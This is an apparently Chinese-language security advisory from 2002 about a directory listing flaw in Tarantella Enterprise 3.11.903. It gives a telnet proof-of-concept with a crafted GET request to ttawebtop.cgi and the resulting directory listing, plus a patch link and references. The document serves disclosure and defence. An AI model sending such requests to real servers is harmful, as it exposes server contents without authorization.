Tarantella Enterprise 3.11.903 存在目录可列表漏洞发布时间:2002-01-29 更新时间:2002-01-29 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Tarantella Enterprise 3.11.903详细描述 Tarantella Enterprise 3 不可插入应用/数据集中解决方案,用户可以通过 WEB接口访问企业资源。其中存在目录列表漏洞可以导致远程用户查看目录内容。 测试代码 shell$ telnet tarantella.somewhere.com 80 Trying 12.34.56.78... Connected to 12.34.56.78. Escape character is '^]'. GET /cgi-bin/ttawebtop.cgi/?action=start&pg= HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 21 Dec 2001 11:34:39 GMT Server: Apache/1.3.4 (Unix) Content-length: 512 Connection: close Content-Type: text/html ?C . ¨º .. 4 cgi-bin ?E direct.html on examples ? help ?Y index.html ?Z index2.html ?[ kiosk.html ?\ kiosk2.html ?] loader.html % mac -v resources native 5 java ?w index2.html.orig ›o modules Îb tsp les x resources.3_11.tar ,w resources.old 解决方案 请在以下地址找到补丁信息: http://www.tarantella.com/security/bulletin-03.html 相关信息 advisory (advisory@isstw.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-01/0304.html |
